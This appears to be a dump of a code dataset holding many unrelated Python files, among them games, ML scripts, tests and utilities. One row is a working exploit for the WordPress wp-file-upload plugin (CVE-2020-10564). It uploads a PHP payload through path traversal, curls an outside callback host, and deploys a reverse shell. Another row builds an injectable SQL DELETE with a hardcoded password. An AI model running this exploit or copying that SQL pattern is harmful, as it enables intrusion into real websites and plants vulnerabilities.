index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
999,400 | 597f2180bb9613889aac4549e5e5d461d72d8177 | import tkinter as tk
from tkinter import *
from tkinter import messagebox
import mysql.connector
import main_window
root = tk.Tk()
root.title('Wypożyczalnia kostiumów - login')
w = 350
h = 175
ws = root.winfo_screenwidth() # width of the screen
hs = root.winfo_screenheight() # height of the screen
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
root.geometry('%dx%d+%d+%d' % (w, h, x, y))
blank = Label(root)
blank.pack()
login = Entry(root, width=20)
password = Entry(root, width=20, show="*")
login_label = Label(root, text="Login", width=10)
password_label = Label(root, text="Hasło")
login_label.pack()
login.pack()
password_label.pack()
password.pack()
def log_me():
try:
database = mysql.connector.connect(
host="localhost",
user=login.get(),
password=password.get(),
database="wypozyczalnia_kostiumow"
)
root.destroy()
main_window.main_window(database, root)
except:
messagebox.showerror("Błąd", "Wprowadzono niepoprawne dane.")
blank = Label(root)
blank.pack()
login_button = Button(root, text="Zaloguj się", command=log_me)
login_button.pack()
root.mainloop()
|
999,401 | f572ce46260bf2d2527210ca427e657aab81271f | from pypal import private_globals as _pal
import ctypes as c
import weakref
from ..bodybase import BodyBase
class MeshTerrain(BodyBase):
def __init__(self, pos, points, triangles):
"""
constructs a static convex and adds it to the world
pos: a 3 part tuple with x,y,z.
size: a 3 part tuple with width, height, depth
"""
CPoints = c.c_float * (len(points) * 3)
cpoints = CPoints()
for i in xrange(len(points)):
for j in xrange(3):
cpoints[(i*3)+j] = points[i][j]
CTris = c.c_int * len(triangles*3)
ctris = CTris()
for i in xrange(len(triangles)):
for j in xrange(3):
ctris[(i*3)+j] = triangles[i][j]
self.obj = _pal.lib.body_static_mesh_terrain_create(c.c_float(pos[0]), c.c_float(pos[1]), c.c_float(pos[2]),
c.pointer(cpoints),len(points)*3, c.pointer(ctris), len(triangles)*3)
self.points = points
self._body_base = _pal.lib.cast_static_mesh_terrain_body_base(self.obj)
def __str__(self):
x, y, z = self.get_position()
return "A Mesh Terrain at : %.2f, %.2f, %.2f" % (x, y, z)
def get_size(self):
"""returns the size of the object in a 3 part tuple"""
return self._size |
999,402 | ddf899f373a043f9981ccb16a10e1f0078142643 | #Escribir un programa que pregunte el nombre del usuario en la consola y un número entero e imprima por pantalla en líneas distintas el nombre del usuario tantas veces como el número introducido.
name = input('Ingrese su nombre: ')
repet = int(input('Ingrese cuantas veces se tiene que repetir: '))
if repet <= 0 :
print('Ingresaste un numero incorrecto')
else:
print((name+"\n") * repet) |
999,403 | 22031aad62185b90e6d0fc1c0b10002b9927f49d | from spdk.rpc.client import print_json
def perform_tests(args):
print_json(args.client.call('perform_tests'))
def spdk_rpc_plugin_initialize(subparsers):
p = subparsers.add_parser('perform_tests',
help='Returns true when hotplug apps starts running IO')
p.set_defaults(func=perform_tests)
|
999,404 | 2131562a7c99dc951cf8f8affcd6c9268cdb89df | import json
import requests
import uuid
from Framework.Library.Function.Function.PocSuite.lib.utils import random_str
import binascii
from Framework.Valueconfig import FORMATTIME, ValueStatus
from Framework.Library.Function.Function.PocSuite.api import paths
class file_upload:
def __init__(self, url):
self.url = url
def check_version(self):
url =self.url + "/wp-content/plugins/wp-file-upload/readme.txt"
resp = requests.get(url, verify=False)
if resp.status_code != 200 :
return False
fixed_version = 4.13
try:
current_version = resp.text.split("== Changelog ==")[1].split("= ")[1].split(" =")[0]
if current_version < str(fixed_version):
return True
else:
return False
except: return False
def exploit(self, php_shell):
page = requests.get(self.url, timeout=5, verify=False)
cookie = page.cookies
print("[+] Plugin url: " + self.url)
filename = random_str(6) + ".txt"
payload = "../plugins/wp-file-upload/lib/" + filename
payload = binascii.hexlify(payload.encode())
nonce = ''
params_index = ''
session_token = ''
if 'wfu_uploader_nonce"' in page.text:
idx = page.text.find('wfu_uploader_nonce" value="') + len('wfu_uploader_nonce" value="')
nonce = page.text[idx:idx+20].split('"')[0]
print("[+] Retrived nonce parameter: " + nonce)
if 'params_index:"' in page.text:
idx = page.text.find('params_index:"') + len('params_index:"')
params_index = page.text[idx:idx+30].split('"')[0]
print("[+] Retrived params_index parameter: " + params_index)
if 'session:"' in page.text:
idx = page.text.find('session:"') + len('session:"')
session_token = page.text[idx:idx+65].split('"')[0]
print("[+] Retrived session_token parameter: " + session_token)
fsize = str(len(php_shell))
admin_ajax_url = self.url + "/wp-admin/admin-ajax.php"
d = {
"action":"wfu_ajax_action_ask_server", "session_token":session_token,
"sid":"1", "unique_id":"KpNKThIx0T", "wfu_uploader_nonce":nonce,
"filenames":payload, "filesizes":fsize
}
resp = requests.post(admin_ajax_url, data=d, cookies=cookie, timeout=5)
if "wfu_askserver_success" in resp.text:
print("[+] Stage 1 success :)")
else:
print("[-] Something went wrong :/")
### stage 2 ###
params = {
"wfu_uploader_nonce":(None,nonce), "action":(None,"wfu_ajax_action"),
"uploadedfile_1_index":(None,"0"), "uploadedfile_1_size":(None,fsize),
"subdir_sel_index":(None,"-1"), "nofileupload_1":(None,"0"), "only_check":(None,"1"),
"session_token":(None,session_token), "uploadedfile_1_name": (None,payload),
"params_index":(None,params_index), "uniqueuploadid_1":(None,"KpNKThIx0T")
}
resp = requests.post(admin_ajax_url, files=params, cookies=cookie, timeout=5)
if "wfu_fileupload_success" in resp.text:
print("[+] Stage 2 work fine :)")
else:
print("[-] Something went wrong :/")
### stage 3 ###
params = {
"wfu_uploader_nonce":(None,nonce), "action":(None,"wfu_ajax_action"),
"uploadedfile_1_index":(None,"0"), "uploadedfile_1_size":(None,fsize),
"subdir_sel_index":(None,"-1"), "nofileupload_1":(None,"0"), "only_check":(None,"0"),
"session_token":(None,session_token), "uploadedfile_1_name": (None,payload),
"params_index":(None,params_index), "uniqueuploadid_1":(None,"KpNKThIx0T"),
"uploadedfile_1":php_shell
}
resp = requests.post(admin_ajax_url, files=params, cookies=cookie, timeout=5)
if "wfu_fileupload_success" in resp.text:
page = requests.get(self.url, timeout=5)
print("[+] Stage 3 work prefectly :)")
print("[+] We should have our webshell, gonna check it!")
else:
print("[-] Something went wrong :/")
def verify(url):
result = file_upload(url)
return result.check_version()
def attack(url, host_check_connect):
result = file_upload(url)
flag = str(uuid.uuid4().hex)
php_code = '''<?php system("curl '''+ host_check_connect + '''/requestbin?data='''+ flag + '''"); ?>'''
result.exploit(php_code)
data_request_log = {
"data": "{}".format(flag)
}
host_check = "{}/logrequestbin".format(host_check_connect)
check = requests.get(host_check,params=data_request_log)
if check.status_code == 200:
data = json.loads(check.text)
if data['status'] == ValueStatus.Success:
return True, php_code
else:
return False, php_code
def shell(vul_url, lhost, lport):
with open(paths.POCSUITE_ROOT_PATH+ "/init_pocs/cve_2020_10564/php-reverse-shell-source.php", "rb") as file:
shell = file.read().decode()
file.close()
php_shell = shell.replace('LHOST_cve_2020_10564', lhost)
php_shell = php_shell.replace('LPORT_cve_2020_10564', lport)
result = file_upload(vul_url)
result.exploit(php_shell)
return True
|
999,405 | b761a695904f8fc0212718bb5792d3fcbbd0cf22 | #!/usr/bin/python
import re
import os
rootdir='/home/gagan/stockquotes'
newdir='/home/gagan/newstockquotes'
def modify(line):
s = re.findall("\[(.*?)\]", line)
if not s:
return
del s[0]
del s[6:12]
for i in range(1,5):
p = s[i].split(',')
p[1] = str(int(float(p[1])+0.5))
s[i] = ','.join(p)
newLine = '[' + "],[".join(s) + ']\n'
return newLine
for subdir, dirs, files in os.walk(rootdir):
for file in files:
f=open(os.path.join(rootdir,file), 'r')
lines=f.readlines()
f.close()
f=open(os.path.join(newdir,file), 'a')
for line in lines:
newline=modify(line)
f.write(newline)
f.close()
filelist = [ f for f in os.listdir(newdir) if f.endswith('~') ]
for f in filelist:
os.remove(os.path.join(newdir,f))
|
999,406 | d8a498cab50262f999ef17afee7a1442794e9832 | from web_app import app
|
999,407 | 6e09ca91ae1c178b3f18591263485247c2e16364 | from model import Account
import unittest
class TestModel(unittest.TestCase):
def test_constructor(self):
dan = Account("4221","333409",0)
self.assertEqual(dan.pin, "4221")
self.assertEqual(dan.account_num, "333409")
self.assertEqual(dan.balance, 0)
# def test_self(self):
# dan = Account("4221","333409",0)
# self.assertTupleEqual(dan.info(333409))
def test_deposit(self):
dan = Account("4221","333409",0)
dan.deposit(1000)
self.assertEqual(dan.balance, 1000)
self.assertRaises(ValueError,dan.deposit,-2000)
self.assertRaises(ValueError,dan.deposit,0)
def test_withdraw(self):
dan = Account("4221","333409",0)
self.assertRaises(ValueError,dan.withdraw,1000)
def test_view_info(self):
dan = Account("4221","333409",0)
result = dan.view_info()
self.assertEqual(result, "\n***Your current balance in account #{} is: ${}.***\n".format(dan.account_num,dan.balance))
|
999,408 | ee1fbf490e6c6051e5c4640fc9675a827ed6ceea | #!/usr/bin/env python
# coding=utf-8
# Copyright 2022 The HuggingFace Team All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Create a VisionEncoderDecoderModel instance from pretrained encoder/decoder models.
The cross-attention will be randomly initialized.
"""
from dataclasses import dataclass, field
from typing import Optional
from transformers import AutoConfig, AutoImageProcessor, AutoTokenizer, FlaxVisionEncoderDecoderModel, HfArgumentParser
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.
"""
output_dir: str = field(
metadata={"help": "The output directory where the model will be written."},
)
encoder_model_name_or_path: str = field(
metadata={
"help": (
"The encoder model checkpoint for weights initialization."
"Don't set if you want to train an encoder model from scratch."
)
},
)
decoder_model_name_or_path: str = field(
metadata={
"help": (
"The decoder model checkpoint for weights initialization."
"Don't set if you want to train a decoder model from scratch."
)
},
)
encoder_config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained encoder config name or path if not the same as encoder_model_name"}
)
decoder_config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained decoder config name or path if not the same as decoder_model_name"}
)
def main():
parser = HfArgumentParser((ModelArguments,))
(model_args,) = parser.parse_args_into_dataclasses()
# Load pretrained model and tokenizer
# Use explicit specified encoder config
if model_args.encoder_config_name:
encoder_config = AutoConfig.from_pretrained(model_args.encoder_config_name)
# Use pretrained encoder model's config
else:
encoder_config = AutoConfig.from_pretrained(model_args.encoder_model_name_or_path)
# Use explicit specified decoder config
if model_args.decoder_config_name:
decoder_config = AutoConfig.from_pretrained(model_args.decoder_config_name)
# Use pretrained decoder model's config
else:
decoder_config = AutoConfig.from_pretrained(model_args.decoder_model_name_or_path)
# necessary for `from_encoder_decoder_pretrained` when `decoder_config` is passed
decoder_config.is_decoder = True
decoder_config.add_cross_attention = True
model = FlaxVisionEncoderDecoderModel.from_encoder_decoder_pretrained(
encoder_pretrained_model_name_or_path=model_args.encoder_model_name_or_path,
decoder_pretrained_model_name_or_path=model_args.decoder_model_name_or_path,
encoder_config=encoder_config,
decoder_config=decoder_config,
)
# GPT2 only has bos/eos tokens but not decoder_start/pad tokens
decoder_start_token_id = decoder_config.decoder_start_token_id
pad_token_id = decoder_config.pad_token_id
if decoder_start_token_id is None:
decoder_start_token_id = decoder_config.bos_token_id
if pad_token_id is None:
pad_token_id = decoder_config.eos_token_id
# This is necessary to make Flax's generate() work
model.config.eos_token_id = decoder_config.eos_token_id
model.config.decoder_start_token_id = decoder_start_token_id
model.config.pad_token_id = pad_token_id
image_processor = AutoImageProcessor.from_pretrained(model_args.encoder_model_name_or_path)
tokenizer = AutoTokenizer.from_pretrained(model_args.decoder_model_name_or_path)
tokenizer.pad_token = tokenizer.convert_ids_to_tokens(model.config.pad_token_id)
model.save_pretrained(model_args.output_dir)
image_processor.save_pretrained(model_args.output_dir)
tokenizer.save_pretrained(model_args.output_dir)
if __name__ == "__main__":
main()
|
999,409 | 029513a81f8d96e2ba15514c199c2de042019e47 | import os
from xml.etree import ElementTree
from stemming.porter2 import stem
import string
from nltk.corpus import wordnet as wn
import re
from constants import *
from scipy.linalg import *
from scipy.spatial import distance
from numpy import *
import string
import enchant
def enrich(queryString):
'''
enrich the query string by adding synonyms to it
'''
words = queryString.split(" ")
mySet = set()
for word in words:
mySet.add(word)
synonyms = wn.synsets(word)
for syn in synonyms:
mySet.add(syn.name.split('.')[0])
return " ".join(mySet)
def destroyer(filename):
'''
This function is used in deleter.py given a filename delete it if it does not have a documentation
'''
with open(filename, 'rt') as f:
tree = ElementTree.parse(f)
toDelete = 1
for node in tree.iter():
if '}' in node.tag:
tag = node.tag.split('}')[1] #ignore the namespace if it is there
else:
tag = node.tag
if tag == 'documentation' and node.text:
toDelete = 0
break
if toDelete:
os.system('rm '+ filename)
return toDelete
def parseXmlDoc(filename):
'''
Get the documentation text of the xml document
'''
with open(filename, 'rt') as f:
tree = ElementTree.parse(f)
docList = []
for node in tree.iter():
if '}' in node.tag:
tag = node.tag.split('}')[1] #ignore the namespace if it is there
else:
tag = node.tag
if tag == 'documentation' and node.text:
docList.append(node.text)
#break
docString = ' '.join(docList)
return docString.encode('ascii', 'ignore') #convert to ascii
def parseXmlElements(filename):
'''
Get the element tag name data (useful for files that dont have documentation)
'''
with open(filename, 'rt') as f:
tree = ElementTree.parse(f)
docList = set()
for node in tree.iter():
if '}' in node.tag:
tag = node.tag.split('}')[1] #ignore the namespace if it is there
else:
tag = node.tag
if tag == 'element' and node.get("name"):
docList.add(node.get("name"))
#break
docString = ' '.join(docList)
return camelCaseSplitter(docString.encode('ascii', 'ignore')) #convert to ascii
class TextProcessor:
def __init__(self):
self.d = enchant.Dict("en_US")
def processText(self, docText):
#convert to lowercase.
text = docText.encode('ascii', 'ignore').strip().replace("\n"," ").lower()
#remove html tags
text = re.sub('<[^>]*>', '', text)
#remove &; from html
text = re.sub('&[^;]*;', '', text)
#remove multiple spaces
text = re.sub(' +',' ', text)
#remove puncutuations
text = text.translate(string.maketrans("",""), string.punctuation)
#remove stop words and stem it.
words = [word for word in text.split(' ')\
if word not in STOP_WORDS and all([c.isalpha() for c in word]) and len(word) > 2 and len(word) < 20]
words = [word for word in words if self.d.check(word)]
return [stem(word) for word in words]
def camelCaseSplitter(docString):
'''
Split camelCase letters ( this is useful for splitting element tag name data)
'''
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', docString)
s1 = re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower().split('_')
s1 = [word.strip() for word in s1 if len(word) > 2]
return ' '.join(s1)
'''
Below are various distance metrics
'''
def getSimilarityFunction(metric):
if metric == COSINE:
return distance.cosine
elif metric == CHEBYSHEV:
return distance.chebyshev
elif metric == CORRELATION:
return distance.correlation
else:
return normalizedEuclidean
def normalizedEuclidean(vec1, vec2):
return norm(vec1 - vec2)
|
999,410 | 56c27ab607dae80411b26edea72595da65dbb62e | import pygame
import random
import math
from pygame import mixer
import os
#for playing with sounds in pygame
#initialize pygame
pygame.init()
#print(f'mixer init: {pygame.mixer.init()}')
pygame.mixer.init()
#clock = pygame.time.Clock()
#create a screen W H
screen = pygame.display.set_mode((800,600))
#adding background to our game
background = pygame.image.load('/home/hoddie/Desktop/Questions/Practice/PythonGame/background1.png')
#we load the background sound here
mixer.music.load('background.wav')
mixer.music.play(-1)
#change the title and icon of our window
pygame.display.set_caption('Space invaders')
#adding icon
icon = pygame.image.load('/home/hoddie/Desktop/Questions/Practice/PythonGame/ufo.png')
pygame.display.set_icon(icon)
#adding the player image
playerimg = pygame.image.load('/home/hoddie/Desktop/Questions/Practice/PythonGame/space-invaders.png')
playerX = 370 #the reason for the values in the varibale playerX and Player Y
playerY = 480 # is we want the player to show up somewehre on the screen in our case we want the center
#change in x
playerX_change = 0
#Enemy
enemyimg = []
enemy_X = []
enemy_Y = []
enemyX_change = []
enemyY_change = []
numofenemies = 6
for i in range(numofenemies):
enemyimg.append(pygame.image.load('/home/hoddie/Desktop/Questions/Practice/PythonGame/monster.png'))
enemy_X.append(random.randint(0, 735 ))#the random lets us spawn enemies any where on the screen
enemy_Y.append(random.randint(50, 150))
enemyX_change.append(5)
enemyY_change.append(45)
#BUllets
#ready state you cannot see the bullet on the screen
#fire the bullet is currently moving
bulletimg = pygame.image.load('/home/hoddie/Desktop/Questions/Practice/PythonGame/bullet.png')
bullet_X = 0
bullet_Y = 480
bulletX_change = 0
bulletY_change = 20
bullet_state = 'ready'
#score
score_value = 0
font = pygame.font.Font('/home/hoddie/Desktop/Questions/Practice/PythonGame/dark_tales/Dark Tales.otf', 32) #here were using the inbuilt free font and givingit a size
textX = 10 #these are the x and y values of where you wna tyour text to appear on the screen
textY = 10
#in the function we fist have to render the score before we blit the score on to the screen
def showscore(x, y):
score = font.render('Score : ' + str(score_value), True, (255, 255, 255))
screen.blit(score, (x, y))
def enemy(x, y, i):
screen.blit(enemyimg[i],(x, y))
def fire_bullet(x,y):
global bullet_state
bullet_state = 'fire'
screen.blit(bulletimg, (x + 16, y + 10))
def isCollision(enemy_X,enemy_Y,bullet_X,bullet_Y):
distance = math.sqrt((math.pow(enemy_X - bullet_X,2)) + (math.pow(enemy_Y - bullet_Y, 2)))
if distance < 27:
return True
else:
return False
def player(x,y):
screen.blit(playerimg,(x, y))#we are drawing the player image on the screen using the "blit"
#game loop makes sure the game is always running unless the quit is clicked
running = True
while running:
# R G B
screen.fill((0,0,0))#we set the color of our screen anything u want to continiously show up or run in the game we put it in the while loop
screen.blit(background,(0, 0))
for event in pygame.event.get(): #this is a pygame event that gets all the events in pygame
if event.type == pygame.QUIT: #were checking if the quit is clicked this is a pygame event
running = False #if the quit is clicked then we turn the loop to false and we quit the program
#if keystroke is pressed check weather is right or left
if event.type == pygame.KEYDOWN:
print('a keystrokes is pressed')
if event.key == pygame.K_LEFT:
print('Left arrow is pressed')
playerX_change = -10
if event.key == pygame.K_RIGHT:
print('right arrow is pressed')
playerX_change = 10
if event.key == pygame.K_SPACE:
if bullet_state is 'ready':
#gets the cuurent x cordinate of the spaceship or player1
bullet_X = playerX
fire_bullet(bullet_X, bullet_Y)
if event.type == pygame.KEYUP:
if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:
print('keystroke has be released')
playerX_change = 0
#here we make sure our spaceship stays with the frame of the assigned window size
#we take in to cosideration the size of our spacship
playerX += playerX_change
if playerX <=0:
playerX = 0
elif playerX >=736:
playerX = 736
#same check for boundry for enemy
for i in range(numofenemies):
enemy_X[i] += enemyX_change[i]
if enemy_X[i] <=0:
enemyX_change[i] = 5
enemy_Y[i] += enemyY_change[i]
elif enemy_X[i] >=736:
enemyX_change[i] = -5
enemy_Y[i] += enemyY_change[i]
#collision
collision = isCollision(enemy_X[i], enemy_Y[i], bullet_X, bullet_Y)
if collision:
bullet_Y = 480
bullet_state = "ready"
score_value += 1
print(score_value)
enemy_X[i] = random.randint(0, 735)
enemy_Y[i] = random.randint(50, 150)
enemy(enemy_X[i], enemy_Y[i], i)
#bullet movement and fire
if bullet_Y <= 0:
bullet_Y = 480
bullet_state = "ready"
if bullet_state is "fire":
fire_bullet(bullet_X,bullet_Y)
bullet_Y -= bulletY_change
#next we call the player and enemy method cause we want the player to always be in the game
player(playerX,playerY)
showscore(textX, textY)
#anychange we make u need to create an update this lets pygame update the whole program with newly added features without it no feature will be displayed
pygame.display.update()
|
999,411 | 91cd0f37e6c076c3388bf58798b335fac101a49c | import sys
import hashlib
if __name__ == '__main__':
if len(sys.argv) != 3:
print("Invalid number of arguments")
print("Usage: integrity.py path_to_file path_to_dir ")
sys.exit()
else:
path_to_file = sys.argv[1]
path_to_dir = sys.argv[2]
if path_to_dir[-1] != '/':
path_to_dir += '/'
try:
with open(path_to_file, 'r') as f:
for line in f:
if len(line.split()) == 3:
filename = line.strip().split()[0]
algorithm = line.strip().split()[1]
hash = line.strip().split()[2]
BUF_SIZE = 65536
md5 = hashlib.md5()
sha1 = hashlib.sha1()
sha256 = hashlib.sha256()
hash_sum = ''
try:
with open(path_to_dir + filename, 'rb') as f2:
while True:
data = f2.read(BUF_SIZE)
if not data:
break
md5.update(data)
sha1.update(data)
sha256.update(data)
if algorithm == 'md5':
hash_sum = md5.hexdigest()
elif algorithm == 'sha1':
hash_sum = sha1.hexdigest()
elif algorithm == 'sha256':
hash_sum = sha256.hexdigest()
else:
print(filename, "WRONG HASHING ALGORITHM")
if hash == hash_sum:
print(filename, "OK")
else:
print(filename, "FAIL")
except FileNotFoundError as e:
print(filename, "NOT FOUND")
else:
print(filename, "WRONG INPUT FORMAT")
except FileNotFoundError as e:
print(e)
sys.exit() |
999,412 | d70d64cf71d0607b655e240b4e8646d108a4d81c | import time
import unittest2
from selenium import webdriver
class loginTest(unittest2.TestCase):
def test_login(self):
self.driver.find_element_by_id("username").send_keys("changcheng")
self.driver.find_element_by_id("password").send_keys("111111")
self.driver.find_element_by_class_name("login_btn").click()
time.sleep(3)
print(self.driver.title)
print(self.driver.current_url)
welcome=self.driver.find_element_by_css_selector(".site-nav-right.fr>a:nth-child(1)").text
print(welcome)
search=self.driver.find_element_by_css_selector(".btn1").get_attribute("value")
print(search)
self.assertEqual("我的会员中心",self.driver.title)
self.assertEqual("http://127.0.0.1/index.php?m=user&c=index&a=index",self.driver.current_url)
self.assertEqual("您好 changcheng",welcome)
self.assertEqual("搜索",search )
@classmethod
def setUpClass(cls):
cls.driver=webdriver.Chrome()
cls.driver.get("http://127.0.0.1/index.php?m=user&c=public&a=login")
cls.driver.implicitly_wait(3)
cls.driver.maximize_window()
@classmethod
def tearDownClass(cls):
cls.driver.quit()
|
999,413 | f22aa93464cc6c93acd5f1ebc5e531d29448ffc7 | """
ANN implementation (Keras).
"""
import keras # DNN library
from preprocessing import * # Data preprocessing
from keras.models import Sequential # ANN model
from keras.layers import Dense # ANN layers
from keras.layers import Dropout # ANN regulatization
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import GridSearchCV
# Integrate ANN with k-fold
def build_classifier(optimizer):
classifier = Sequential()
classifier.add(Dense(activation="relu", input_dim=11, units=6, kernel_initializer="uniform"))
classifier.add(Dropout(rate=0.1))
classifier.add(Dense(activation="relu", units=6, kernel_initializer="uniform"))
classifier.add(Dropout(rate=0.1))
classifier.add(Dense(activation="sigmoid", units=1, kernel_initializer="uniform"))
classifier.compile(optimizer=optimizer, loss="binary_crossentropy", metrics=["accuracy"])
return classifier
# Wrap classifier with GridSearchCV object with
# cross validation implementation
classifier = KerasClassifier(build_fn=build_classifier)
parameters = {"batch_size": [25, 32], "epochs": [100, 500], "optimizer": ["adam", "rmsprop"]}
grid_search = GridSearchCV(estimator=classifier,
param_grid=parameters,
scoring="accuracy",
cv=10)
grid_search = grid_search.fit(x_train, y_train)
best_parameters = grid_search.best_params_
best_accuracy = grid_search.best_score_
print("Parameters: ", best_parameters)
print("Best accuracy: ", best_accuracy)
|
999,414 | 18251106888ee4cba47f66550122f993c3e10ea4 | # AST nodes for micro-ML.
#
# Eli Bendersky [http://eli.thegreenplace.net]
# This code is in the public domain.
class ASTNode:
def visit_children(self, func):
"""Visit all children with a function that takes a child node."""
for child in self._children:
func(child)
# Used by the type inference algorithm.
_type = None
# Used by passes that traverse the AST. Each concrete node class lists the
# sub-nodes it has as children.
_children = []
class IntConstant(ASTNode):
def __init__(self, value):
self.value = value
def __str__(self):
return str(self.value)
class BoolConstant(ASTNode):
def __init__(self, value):
self.value = value
def __str__(self):
return str(self.value)
class Identifier(ASTNode):
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
class OpExpr(ASTNode):
"""Binary operation between expressions."""
def __init__(self, op, left, right):
self.op = op
self.left = left
self.right = right
self._children = [self.left, self.right]
def __str__(self):
return '({} {} {})'.format(self.left, self.op, self.right)
class AppExpr(ASTNode):
"""Application of a function to a sequence of arguments.
func is a node, args is a sequence of nodes.
"""
def __init__(self, func, args=()):
self.func = func
self.args = args
self._children = [self.func, *self.args]
def __str__(self):
return 'App({}, [{}])'.format(self.func,
', '.join(map(str, self.args)))
class IfExpr(ASTNode):
"""if ... then ... else ... expression."""
def __init__(self, ifexpr, thenexpr, elseexpr):
self.ifexpr = ifexpr
self.thenexpr = thenexpr
self.elseexpr = elseexpr
self._children = [self.ifexpr, self.thenexpr, self.elseexpr]
def __str__(self):
return 'If({}, {}, {})'.format(
self.ifexpr, self.thenexpr, self.elseexpr)
class LambdaExpr(ASTNode):
"""lambda [args] -> expr"""
def __init__(self, argnames, expr):
self.argnames = argnames
self.expr = expr
self._children = [self.expr]
def __str__(self):
return 'Lambda([{}], {})'.format(', '.join(self.argnames), self.expr)
# Used by the type inference algorithm to map discovered types for the
# arguments of the lambda. Since we list arguments as names (strings) and
# not ASTNodes, we can't keep their _type on the node.
_arg_types = None
class Decl(ASTNode):
"""Declaration mapping name = expr.
For functions expr is a Lambda node.
"""
def __init__(self, name, expr):
self.name = name
self.expr = expr
self._children = [self.expr]
def __str__(self):
return 'Decl({}, {})'.format(
self.name, self.expr)
|
999,415 | e9230402b95a6df30f8be617f74146dcf7d7b2be | # delete
import pymysql.cursors
try:
conexao = pymysql.connect(
host = "localhost",
user = "root",
password = "4linux",
db = "4linux",
charset = "utf8mb4",
cursorclass = pymysql.cursors.DictCursor)
except Exception as err:
print("*** ERRO AO TENTAR CONECTAR COM O MYSQL")
print(err)
else:
with conexao.cursor() as cursor:
id_pessoa = input("Informe o ID: ")
SQL = "Delete from pessoa WHERE id_pessoa = {}".format(id_pessoa)
cursor.execute(SQL)
conexao.commit()
finally:
conexao.close()
|
999,416 | 717925d0bfe80d55a981d5ed08eb5a50540da2ea | #!/usr/bin/python
# -*- coding:utf-8 -*-
from ByPlatform.ProtocolHelper.ProtocolHelper import *
from ByPlatform.ProtocolHelper.Protocols.ProtocolBase import *
from ByPlatform.Base.OutPutHelper import *
from ByPlatform.StorageHelper.StorageType import StorageType
from ByPlatform.StorageHelper.StorageHelper import StorageHelper
from ByPlatform.StorageHelper.ReadDataHelper import ReadDataHelper
from ByPlatform.Base.TimeHelper import TimeHelper
from datetime import datetime,timedelta
import time
class ProTerminalUsage(ProtocolBase):
SKIP_COMPUTER_NOT_OPEN = False
CMD_CODE = "1160"
def __init__(self):
super(ProTerminalUsage, self).__init__()
self.Command = MessageDefine.getCommand(ProTerminalUsage.CMD_CODE)
self.StartDate = None
self.StopDate = None
def searchDate(self,ackHandle):
handle = StorageHelper(None, StorageType.DevicesMonitor)
data = ReadDataHelper()
data.SetDBService(handle)
handle.StartStorageServce()
results = data.QueryRangeData(lgt_conditions=self.StartDate,ltt_condition=self.StopDate, cmp_key = "recorddate")
# 如果没有记录
if not results or len(results) <= 0:
return
# 数值计算
startDate = TimeHelper.String2Date(self.StartDate)
stopDate = TimeHelper.String2Date(self.StopDate)
sepDate = (stopDate - startDate).days + 1
for oneIndex in range (sepDate):
timespan = timedelta(days=oneIndex)
startDateTemp = startDate + timespan
dataValue = TimeHelper.dateToString(startDateTemp)
findHandle = None
for oneResult in results:
if oneResult["recorddate"] == dataValue:
findHandle= oneResult
break
# 这天没开机
if not findHandle:
if not ProTerminalUsage.SKIP_COMPUTER_NOT_OPEN:
ackHandle.TotalTimes = ackHandle.TotalTimes + 8*3600
continue
ackHandle.TotalTimes = ackHandle.TotalTimes + 8 * 3600
ackHandle.InteractTimes = ackHandle.InteractTimes + int(findHandle["interactiontimes"])
pass
ackHandle.Rates = ackHandle.InteractTimes*100.0/ackHandle.TotalTimes
class ProTerminalUsageAck(ProtocolBase):
CMD_CODE = "1161"
def __init__(self):
super(ProTerminalUsageAck, self).__init__()
self.Command = MessageDefine.getCommand(ProTerminalUsageAck.CMD_CODE)
self.Name = None
self.Code = None
self.TotalTimes = 0
self.InteractTimes = 0
self.Rates = 0.0
if __name__ == "__main__":
MSG = '00000001371021000.000.000.0000005Name:caojiaju|IpAddress:192.168.1.200|HttpPort:29001|UdpPort:28001|Code:09d623c09c4711e8bca1989096c1d848'
abc = ProtocolHelper.bindProtocol(MSG)
abc.loadFromMsg(MSG)
OutPutHelper.consolePrint(abc.packageMsg())
|
999,417 | 7cfae498c9e4925f86b8426c02c6963ee14367bd | import ast
from typing import Set
from flake8_named_arguments import Plugin
def _results(s: str) -> Set[str]:
tree = ast.parse(s)
plugin = Plugin(tree)
return {f'{line}: {col} {msg}' for line, col, msg, _ in plugin.run()}
def test_trivial_case():
assert _results('') == set()
|
999,418 | 3dd338881924e3d917157dc9f258f082ca9815fc | """ Script to analyze Fast Neutron Background in JUNO detector:
In the first part of the script:
- Calculate the pulse shape of the prompt signal of fast neutrons.
- As simulated neutrons, the files user_neutron_10_MeV_{}.root, user_neutron_100_MeV_{}.root,
user_neutron_300_MeV_{}.root and user_neutron_500_MeV_{}.root (from 'conversion_nPE_MeV') are used.
- Files user_neutron_10_MeV_0.root to user_neutron_10_MeV_99.root can not be used, because they deposit too less
energy in the detector and therefore the hittime distribution has only a few ten entries (Qedep only from
0.2 MeV to 5 MeV).
For files user_neutron_100_MeV_0.root to user_neutron_100_MeV_99.root, Qedep is from 1.2 MeV to 7.4 MeV.
For files user_neutron_300_MeV_0.root to user_neutron_300_MeV_99.root, Qedep is from 1.5 MeV to 40 MeV.
For files user_neutron_500_MeV_0.root to user_neutron_500_MeV_99.root, Qedep is from 0.0 MeV to 113 MeV.
- Procedure to get the hittime distribution with vertex reconstruction and time smearing of PMTs:
1. apply same cuts like on prompt signals of NC events:
1.1 energy cut on prompt signal: only neutrons with energy from 10 MeV to 100 MeV (here either 10 or 100 MeV)
are simulated -> energy cut is applied automatically
1.2 volume cut: must be same like for NC events (take initial position of initial particle -> smear it with
